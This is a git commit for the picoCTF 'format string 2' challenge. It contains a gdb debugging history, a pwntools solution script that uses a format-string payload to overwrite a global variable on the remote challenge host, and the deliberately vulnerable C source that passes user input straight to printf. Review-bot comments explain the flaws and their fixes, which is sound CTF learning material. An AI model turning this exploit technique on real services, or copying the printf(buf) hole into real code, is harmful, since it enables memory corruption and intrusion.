format string 2

Maxime Vorwerk
2024-11-02 02:00:29 +01:00
parent 198d87467e
commit b4bd094d7e
5 changed files with 278 additions and 0 deletions


@@ -0,0 +1,217 @@
disassemble main
b *main+75
run
exit
disams main
disasm
disams main
disasm main
disassemble main
b *main+75
run
n
n
n
n
stack
stack 10
stack 20
stack 40
search 0x21737573
search \x21\x73\x75\x73
search -dword 0x21737573
search --dword 0x21737573
search --dword 0x00404060
search --qword 0x0000000000404060
disassemble main
stack 40
stack 60
search --dword 0x21737573
run
continue
run
stack 40
stack 60
continue
run
search --dword 0x21737573
continue
run
continue
run
disassemble main
exit
disassemble main
exit
disassemble main
b *main+95
run
stack 60
help x
stack 60
x 1xg 0x7fffffffbc70
x 1x 0x7fffffffbc70
x 0x7fffffffbc70
x 0x7fffffffbc70
2x 0x7fffffffbc70
x2 0x7fffffffbc70
x 2 0x7fffffffbc70
x /2 0x7fffffffbc70
x /1xg 0x7fffffffbc70
n
x /1xg 0x7fffffffbc70A
continue
continue
run
exit
b *main+95
run
x /1xg 0x7fffffffbc70A
stack
stack 60
x /1xg 0x7fffffffbc70
continue
run
stack
stack 60
x /1xg 0x7fffffffbc70
continue
run
stack 60
continue
exit
python import sys
python print(sys.path)
exit
exit
exit
exit
exit
exit
exit
exit
exit
exit
disassemble main
b *main+95
run
stack 40
continue
disassemble main
run
stack 40
continue
search b570
find b570
run
stack 40
continue
info
exit
disassemble main
b *main+95
run
stack 40
continue
run
stack 40
continue
run
n
stack 40
exit
disassemble main
b *main+95
run
n
x/1x
x/2xw 0x7fffffffb570
x/xw 0x7fffffffb570
x 0x7fffffffb570
continue
run
x 0x7fffffffb570
n
x 0x7fffffffb570
continue
run
stack 60
continue
run
stack 60
n
continue
run
stack 20
continue
run
stack
stack20
stack 20
continue
run
stack 20
continue
run
exit
b *main+95
run < python print(b"\x60\x40\x40\x00")
run < python -c "print(b"\x60\x40\x40\x00")"
run < python3 -c "print(b"\x60\x40\x40\x00")"
exit
b *main+95
run < pipe
exit
b *main+95
run < pipe
continue
exit
b *main+95
run < pipe
stack 20
x 0x404060
n
x 0x404060
exit
b *main+95
run
stack 20
n
exit
exit
b *main+95
run
run < pipe
x 0x404060
n
x 0x404060
stack 20
continue
exit
b *main+95
run
run < pipe
disassemble main
x 0x404060
x 0x7fffffffba00
x $rip
x $rip+0x2de7
x 0x401273+0x2de7
x 0x401279+0x2de7
stack 40
continue
run
stack 40
n
run < pipe
stack 20
continue
run < pipe
stack 20
continue
run < pipe
stack 20
continue
run < pipe
stack 20
exit


@@ -0,0 +1,2 @@
break *main+95

24
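--- a/format_string_2/sol.py
+++ b/format_string_2/sol.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python3
+from pwn import *
+context.arch = "amd64"
+address = "rhea.picoctf.net"
+port = 51393
+conn = remote(address, port)
+def send_payload(payload):
+conn = remote(address, port)
+log.info(f"payload: {repr(payload)}")
+conn.sendline(payload)
+return conn.recvall()
+format_string = FmtStr(send_payload)
+offset = format_string.offset
+payload = fmtstr_payload(offset, {0x404060: 0x67616c66})
+log.info(payload)
+conn.sendline(payload)
+flag = conn.recvall()
+log.success(flag)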
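Review bot: `send_payload` opens a fresh `remote()` on every probe but never closes it, so each round of offset discovery leaks a socket for the lifetime of the script; once `conn.recvall()` has returned the connection is finished and should be closed before returning, e.g. `data = conn.recvall()`, `conn.close()`, `return data`. The local `conn` also shadows the module-level `conn` opened on line 246, which then sits idle until line 256 — renaming the local (say `probe`) would make the two lifetimes obvious. The magic numbers on line 254 deserve a comment, since nothing on the page ties them to the target: 0x404060 is presumably the address of the global `sus` in vuln.c (it is the address inspected in the gdb history) and 0x67616c66 is the value its `if` compares against, i.e. the bytes `b"flag"` little-endian. The comparison value and the symbol address could be read from the binary with pwntools' `ELF` instead of being hard-coded, so a rebuilt target does not silently break the script.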

BIN
format_string_2/vuln Executable file

Binary file not shown.

35
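--- a/format_string_2/vuln.c
+++ b/format_string_2/vuln.c
@@ -0,0 +1,35 @@
+#include <stdio.h>
+int sus = 0x21737573;
+int main() {
+char buf[1024];
+char flag[64];
+printf("You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?\n");
+fflush(stdout);
+scanf("%1024s", buf);
+printf("Here's your input: ");
+printf(buf);
+printf("\n");
+fflush(stdout);
+if (sus == 0x67616c66) {
+printf("I have NO clue how you did that, you must be a wizard. Here you go...\n");
+// Read in the flag
+FILE *fd = fopen("flag.txt", "r");
+fgets(flag, 64, fd);
+printf("%s", flag);
+fflush(stdout);
+}
+else {
+printf("sus = 0x%x\n", sus);
+printf("You can do better!\n");
+fflush(stdout);
+}
+return 0;
+}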
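Review bot: `scanf("%1024s", buf)` on line 277 can store 1024 characters plus the terminating NUL into the 1024-byte `buf` declared on line 273, a one-byte stack overflow independent of the challenge's intended bug; the field width must be one less than the buffer, `scanf("%1023s", buf);`. The `fopen` on line 285 is never checked, so a missing or unreadable flag.txt makes `fgets` dereference a NULL `FILE *` — add `if (!fd) { perror("flag.txt"); return 1; }` before the read, and `fclose(fd)` after it. `printf(buf)` on line 279 passes user input as the format string, which is the vulnerability this challenge exists to teach; the idiomatic form outside a CTF target is `printf("%s", buf);`, and `-Wformat-security` would have flagged it at compile time. The `main()` declaration on line 272 should be `int main(void)` to give it a prototype.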